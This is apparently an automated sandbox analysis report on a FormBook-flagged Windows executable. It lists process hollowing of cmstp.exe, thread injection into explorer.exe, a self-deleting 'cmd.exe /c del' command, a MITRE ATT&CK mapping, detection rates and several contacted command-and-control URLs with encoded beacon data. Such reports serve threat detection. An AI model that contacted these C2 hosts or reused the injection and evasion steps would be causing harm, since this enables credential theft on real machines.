Memory written: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe base: 400000 value starts with: 4D5A

Jump to behavior

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	Section loaded: unknown target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	Section loaded: unknown target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	Thread register set: target process: 3292			Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe	Thread register set: target process: 3292			Jump to behavior

Queues an APC in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Show sources

Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe

Section unmapped: C:\Windows\SysWOW64\cmstp.exe base address: A30000

Jump to behavior

Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	Process created: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe			Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe'			Jump to behavior

Source: explorer.exe, 00000004.00000002.505989523.0000000001400000.00000002.00000001.sdmp, cmstp.exe, 00000007.00000002.505513553.0000000002E80000.00000002.00000001.sdmp	Binary or memory string: uProgram Manager
Source: explorer.exe, 00000004.00000000.265786976.0000000005F40000.00000004.00000001.sdmp, cmstp.exe, 00000007.00000002.505513553.0000000002E80000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000004.00000002.505989523.0000000001400000.00000002.00000001.sdmp, cmstp.exe, 00000007.00000002.505513553.0000000002E80000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000004.00000002.505989523.0000000001400000.00000002.00000001.sdmp, cmstp.exe, 00000007.00000002.505513553.0000000002E80000.00000002.00000001.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000004.00000002.503355168.0000000000EB8000.00000004.00000020.sdmp	Binary or memory string: ProgmanX
Source: explorer.exe, 00000004.00000000.272543308.0000000008ACF000.00000004.00000001.sdmp	Binary or memory string: Shell_TrayWndAj

Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	Queries volume information: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000003.00000002.287250589.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.288102436.00000000018D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.508139744.0000000004460000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.287644899.0000000001550000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.502602967.0000000000680000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.247215566.00000000045E9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.505004698.0000000002C20000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 3.2.w73FtMA4ZTl9NFm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.w73FtMA4ZTl9NFm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.w73FtMA4ZTl9NFm.exe.46875f8.3.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000003.00000002.287250589.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.288102436.00000000018D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.508139744.0000000004460000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.287644899.0000000001550000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.502602967.0000000000680000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.247215566.00000000045E9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.505004698.0000000002C20000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 3.2.w73FtMA4ZTl9NFm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.w73FtMA4ZTl9NFm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.w73FtMA4ZTl9NFm.exe.46875f8.3.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Shared Modules1	Path Interception	Process Injection612	Rootkit1	Credential API Hooking1	Security Software Discovery221	Remote Services	Credential API Hooking1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Masquerading1	LSASS Memory	Process Discovery2	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Ingress Tool Transfer1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Disable or Modify Tools1	Security Account Manager	Virtualization/Sandbox Evasion31	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Virtualization/Sandbox Evasion31	NTDS	Remote System Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol12	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Process Injection612	LSA Secrets	System Information Discovery112	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Deobfuscate/Decode Files or Information1	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Obfuscated Files or Information4	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Software Packing3	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
w73FtMA4ZTl9NFm.exe	30%	Virustotal		Browse
w73FtMA4ZTl9NFm.exe	45%	ReversingLabs	ByteCode-MSIL.Trojan.Agentesla

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
3.2.w73FtMA4ZTl9NFm.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen		Download File

Domains

Source	Detection	Scanner	Label	Link
www.sweette.com	0%	Virustotal		Browse
clientconfig.passport.net	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
www.naiping8.com/blm/	0%	Avira URL Cloud	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.kompramania.com/blm/?v4=jT8U/4hmrcCGqX5zF6RLU3xaP16cys1ENKtgh6K33uf7HOVcxmeLoGjIinA45QceqzYG68+/fQ==&Jr=V48DzvNH	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.sweette.com	64.190.62.111	true	true	0%, Virustotal, Browse	unknown
parkingpage.namecheap.com	198.54.117.212	true	false		high
www.kompramania.com	unknown	unknown	true		unknown
clientconfig.passport.net	unknown	unknown	true	0%, Virustotal, Browse	unknown
www.findinkjams.com	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
www.naiping8.com/blm/	true	Avira URL Cloud: safe	low
http://www.kompramania.com/blm/?v4=jT8U/4hmrcCGqX5zF6RLU3xaP16cys1ENKtgh6K33uf7HOVcxmeLoGjIinA45QceqzYG68+/fQ==&Jr=V48DzvNH	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.autoitscript.com/autoit3/J	explorer.exe, 00000004.00000002.524154545.000000000686B000.00000004.00000001.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0	explorer.exe, 00000004.00000000.273388451.000000000BE76000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com	explorer.exe, 00000004.00000000.273388451.000000000BE76000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designersG	explorer.exe, 00000004.00000000.273388451.000000000BE76000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designers/?	explorer.exe, 00000004.00000000.273388451.000000000BE76000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/bThe	explorer.exe, 00000004.00000000.273388451.000000000BE76000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers?	explorer.exe, 00000004.00000000.273388451.000000000BE76000.00000002.00000001.sdmp	false		high
http://www.tiro.com	explorer.exe, 00000004.00000000.273388451.000000000BE76000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers	explorer.exe, 00000004.00000000.273388451.000000000BE76000.00000002.00000001.sdmp	false		high
http://www.goodfont.co.kr	explorer.exe, 00000004.00000000.273388451.000000000BE76000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css	w73FtMA4ZTl9NFm.exe, 00000001.00000002.246792230.0000000003635000.00000004.00000001.sdmp	false		high
http://www.carterandcone.coml	explorer.exe, 00000004.00000000.273388451.000000000BE76000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.sajatypeworks.com	explorer.exe, 00000004.00000000.273388451.000000000BE76000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.typography.netD	explorer.exe, 00000004.00000000.273388451.000000000BE76000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	explorer.exe, 00000004.00000000.273388451.000000000BE76000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/cThe	explorer.exe, 00000004.00000000.273388451.000000000BE76000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	explorer.exe, 00000004.00000000.273388451.000000000BE76000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://fontfabrik.com	explorer.exe, 00000004.00000000.273388451.000000000BE76000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.founder.com.cn/cn	explorer.exe, 00000004.00000000.273388451.000000000BE76000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-jones.html	explorer.exe, 00000004.00000000.273388451.000000000BE76000.00000002.00000001.sdmp	false		high
http://www.jiyu-kobo.co.jp/	explorer.exe, 00000004.00000000.273388451.000000000BE76000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/DPlease	explorer.exe, 00000004.00000000.273388451.000000000BE76000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers8	explorer.exe, 00000004.00000000.273388451.000000000BE76000.00000002.00000001.sdmp	false		high
http://www.fonts.com	explorer.exe, 00000004.00000000.273388451.000000000BE76000.00000002.00000001.sdmp	false		high
http://www.sandoll.co.kr	explorer.exe, 00000004.00000000.273388451.000000000BE76000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.urwpp.deDPlease	explorer.exe, 00000004.00000000.273388451.000000000BE76000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	explorer.exe, 00000004.00000000.273388451.000000000BE76000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	w73FtMA4ZTl9NFm.exe, 00000001.00000002.246739537.00000000035E1000.00000004.00000001.sdmp	false		high
http://www.sakkal.com	explorer.exe, 00000004.00000000.273388451.000000000BE76000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://github.com/unguest	w73FtMA4ZTl9NFm.exe	false		high
https://github.com/unguest9WinForms_RecursiveFormCreate5WinForms_SeeInnerExceptionGProperty	w73FtMA4ZTl9NFm.exe	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
198.54.117.212	parkingpage.namecheap.com	United States		22612	NAMECHEAP-NETUS	false

General Information

Joe Sandbox Version:	32.0.0 Black Diamond
Analysis ID:	403703
Start date:	04.05.2021
Start time:	10:37:42
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 11m 29s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	w73FtMA4ZTl9NFm.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	27
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@7/1@4/1
EGA Information:	Failed
HDC Information:	Successful, ratio: 18.4% (good quality ratio 16.5%) Quality average: 70.1% Quality standard deviation: 32.5%
HCA Information:	Successful, ratio: 100% Number of executed functions: 94 Number of non-executed functions: 142
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe

Simulations

Behavior and APIs

Time	Type	Description
10:38:36	API Interceptor	1x Sleep call for process: w73FtMA4ZTl9NFm.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
198.54.117.212	MRQUolkoK7.exe	Get hash	malicious	Browse	www.blazerplanning.com/8u3b/?o2=iN68aFPHs&9rwxC4Lh=JlLpmPAzMmQyvHQwr5UMVliwPWakpnfQ1/iZiKdXRC0gvSv7c7ocKU7ECD3d27LqzKr0tNAMaQ==
	Bank Details.xlsx	Get hash	malicious	Browse	www.thesixteenthround.net/aqu2/?NP=s0A+R2zuZA1+LPHAc9M/AmUzyN8aP2GBLv9J4fG53S1jdbvs3uSd9usyNyOEpwpEqUbLdg==&Yzrt=nN6d4T
	New order.exe	Get hash	malicious	Browse	www.milestonesrls.online/n30n/?GdIH=4/VSTdRgjoHrn+qSdMCKVXShlJLaSm84jLgodp9buoZ+qe3slXHJ+FG3aXuYEDG1TdkG&Ajn=6lNDphQHVxzXvzn0
	Shinshin Machinery.exe.exe	Get hash	malicious	Browse	www.bakoroast.coffee/g7b/?Bzu=X+rBV3VeTRPsG/IiwPgAjJR7FEhfgRdscRWTA3Iua2yUCn27Cctf8aE4Tun6k6kIXyXe&Rxo=M6hD4jnx_05t
	INV-210318L.exe	Get hash	malicious	Browse	www.owe.pink/vsk9/?EvI=CR-0dB&YV805PL=lPye3ad5VliS0kw2YotKykUI/f06ulyVlr48O2QWPrzqY2uuE1iv1/UVrBfqkmRpTwF2mwsV5g==
	1LHKlbcoW3.exe	Get hash	malicious	Browse	www.boogerstv.com/p2io/?rN=d8VD7828W8N&CR=fW2NkW2j278wyrs6d/m+egXTc5dWq8qtohQAL+tQrXSmfdetyJ3HBVVg7gxb9s6RBL4M
	PO# 4510175687.exe	Get hash	malicious	Browse	www.owe.pink/vsk9/?I6A=lPye3ad5VliS0kw2YotKykUI/f06ulyVlr48O2QWPrzqY2uuE1iv1/UVrCzQnn9SQHkn&ofutZl=xVMtGJhp
	LrJiu5vv1t.exe	Get hash	malicious	Browse	www.ifdca.com/m0rc/?9rspeh=lbR5C4q/Bs6c3SKeepmv0Da9hIgPOrZf3Ut381rRSdXn0224bmGUGa2i5otESCz2qCMY&Ppd=_6g8CdsPd2MHu
	1nmYiiE0nY.exe	Get hash	malicious	Browse	www.toplevelsealcoating.net/njo/?CZ=8pBxZbI&w2=mxuHlFV7ZpSkuYg6Lcwsp6DcsuxeedOYcKnp3vLhruQtfiblvIYsgHAA5V0E6fjYQA2BXcpyvw==
	KK7wD2vDmF.exe	Get hash	malicious	Browse	www.toplevelsealcoating.net/njo/?nRYxC8=mxuHlFV7ZpSkuYg6Lcwsp6DcsuxeedOYcKnp3vLhruQtfiblvIYsgHAA5WYUmu/jX1fQ&Lh38=ZTdtG87X0j
	PO 213409701.xlsx	Get hash	malicious	Browse	www.304shaughnessygreen.info/oean/?rFQt=d8/ljYFal4PMYfvauWUnApMkbVV7hvzPIdajggbW2e5rOGYmCrO1nFh35A2MgOnQN9VHwA==&rF=9rbPKz
	SAMSUNG C&T UPCOMING PROJECTS19-MP.exe.exe	Get hash	malicious	Browse	www.marcellelizabeth.life/cdl/?Mfg=M/zpEzS8W9oCfIylLsSUMmJUovgo5PqMMB6b2NznY4m/oZHGIJjoAjEmtsxcvBVMY/Td&uVxpj=ojO0dJYX1B
	KROS Sp. z.o.o.exe	Get hash	malicious	Browse	www.angermgmtathome.com/kio8/?9rj0DvY=e6NOpdhu6GIIdtRIIRGR8dBI9mtGur58S+UqNMdGsY3OVbM2U6HgcHgaHwr7dyfFZUjr&v4=Ch6Lm
	SAMSUNG C&T UPCOMING PROJECTS19-027-MP-010203.exe.exe	Get hash	malicious	Browse	www.marcellelizabeth.life/cdl/?Et08qv=M/zpEzS8W9oCfIylLsSUMmJUovgo5PqMMB6b2NznY4m/oZHGIJjoAjEmtsxcvBVMY/Td&uXK=hpgd6NmPQLRDNXK
	IMG_1107.EXE	Get hash	malicious	Browse	www.inifinityapps.net/bf3/?DXOX-=swuzFfgzYDLB3Bi4piS9eAlbkrlhpvPYJEwernceI/wmg54lN6WJu/MxY2tI0Dh/A+Qh&KzuH=XPjDi0j0G
	Bank details.exe	Get hash	malicious	Browse	www.nuevasantatecla.com/ehxh/?DVBh=2SjzOZmHZnnKS6lUkurSin0GpOD0orQTIR1dgfvJrCJBvqRU2lp5oKty/puKetsuF8gN&1b0hlT=gvRpjb_Xgb6xvP
	in.exe	Get hash	malicious	Browse	www.seak.xyz/uds2/?Y4spQFW=vIE1ET6pQu49m+QHY7YrZ7t2bRuoKngw2h26Ua5bu/NnC6rxsHDfr4DpunyQx1XamxAZm7X6xg==&Ezu=VTChCL_ht2spUrI
	SKM_C258201001130020005057.exe	Get hash	malicious	Browse	www.nmsu.red/qef6/?D0G=dK6pc5Oo00TZ1lrwhWBq4bcwDNmrs3+St52Ej8uVu8gxg21O2w9JytjpowhKGLTyrptJ&Q2J=fjlpdDePPPndHZ
	SecuriteInfo.com.Heur.16160.xls	Get hash	malicious	Browse	www.amionyoutube.com/p2he/?cF=xs0ZKR14962ZgwK/QWp0JFwCibQKs8mKtb995OflH30hWAUvABOJR7m/kpvGi8TCnZzAYQ==&SBZ=epg8b
	n41pVXkYCe.exe	Get hash	malicious	Browse	www.swavhca.com/jskg/?8pJPDtoX=d8LPYq+5Arayfm1vXo3Q9MeTj0bruQyaWpvdMQHKTdQ1FO0+Z34o/nFcLA/t2X2IEXB72feptg==&CvL0=inCTmHzH

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
parkingpage.namecheap.com	Remittance Advice pdf.exe	Get hash	malicious	Browse	198.54.117.212
	d801e424_by_Libranalysis.docx	Get hash	malicious	Browse	198.54.117.218
	MRQUolkoK7.exe	Get hash	malicious	Browse	198.54.117.212
	REVISED PURCHASE ORDER.exe	Get hash	malicious	Browse	198.54.117.217
	z5Wqivscwd.exe	Get hash	malicious	Browse	198.54.117.218
	AL-IEDAHINV.No09876543.exe	Get hash	malicious	Browse	198.54.117.218
	register.jpg.dll	Get hash	malicious	Browse	198.54.117.217
	24032130395451.pdf .exe	Get hash	malicious	Browse	198.54.117.218
	PO17439.exe	Get hash	malicious	Browse	198.54.117.215
	pdf Re revised PI 900tons.exe	Get hash	malicious	Browse	198.54.117.216
	YJgdGYWCni.exe	Get hash	malicious	Browse	198.54.117.211
	Passport_ID_jpg.exe	Get hash	malicious	Browse	198.54.117.211
	Taekwang Quote - 210421_001.exe	Get hash	malicious	Browse	198.54.117.211
	Ac5RA9R99F.exe	Get hash	malicious	Browse	198.54.117.218
	SA-NQAW12n-NC9W03-pdf.exe	Get hash	malicious	Browse	198.54.117.218
	1400000004-arrival.exe	Get hash	malicious	Browse	198.54.117.211
	qmhFLhRoEc.exe	Get hash	malicious	Browse	198.54.117.217
	uNttFPI36y.exe	Get hash	malicious	Browse	198.54.117.216
	dw0Iro1gcR.exe	Get hash	malicious	Browse	198.54.117.210
	PO#293701 pdf.exe	Get hash	malicious	Browse	198.54.117.217

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
NAMECHEAP-NETUS	Synchronoss Payment.html	Get hash	malicious	Browse	199.192.16.144
	PO KV18RE001-A5193.doc	Get hash	malicious	Browse	198.54.122.60
	Receipt 309210k.exe	Get hash	malicious	Browse	199.193.7.228
	FROCH ENTERPRISE PROFILE.doc	Get hash	malicious	Browse	198.54.122.60
	purchase order.doc	Get hash	malicious	Browse	198.54.122.60
	LAjei2S8bg.exe	Get hash	malicious	Browse	198.54.122.60
	QEpa8OLm9Z.exe	Get hash	malicious	Browse	198.54.122.60
	calvary petroleum.doc	Get hash	malicious	Browse	198.54.122.60
	SecuriteInfo.com.Trojan.PackedNET.405.1325.exe	Get hash	malicious	Browse	198.54.122.60
	PO#453882.exe	Get hash	malicious	Browse	199.193.7.228
	customer request.exe	Get hash	malicious	Browse	198.54.126.165
	PO #4568.exe	Get hash	malicious	Browse	162.0.229.222
	DHL_document11022020680908911.doc.exe	Get hash	malicious	Browse	198.54.122.60
	Sidertaglio PO_20210305.doc	Get hash	malicious	Browse	198.54.122.60
	WORK 152021.exe	Get hash	malicious	Browse	68.65.120.142
	WORK 152021.exe	Get hash	malicious	Browse	68.65.120.142
	WORK 152021.exe	Get hash	malicious	Browse	68.65.120.142
	6cL8n8lldi.exe	Get hash	malicious	Browse	198.54.122.60
	Import shipment.exe	Get hash	malicious	Browse	198.54.126.165
	DHL_document11022020680908911.doc.exe	Get hash	malicious	Browse	198.54.122.60

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\w73FtMA4ZTl9NFm.exe.log Download File
Process:	C:\Users\user\Desktop\w73FtMA4ZTl9NFm.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1314
Entropy (8bit):	5.350128552078965
Encrypted:	false
SSDEEP:	24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
MD5:	1DC1A2DCC9EFAA84EABF4F6D6066565B
SHA1:	B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
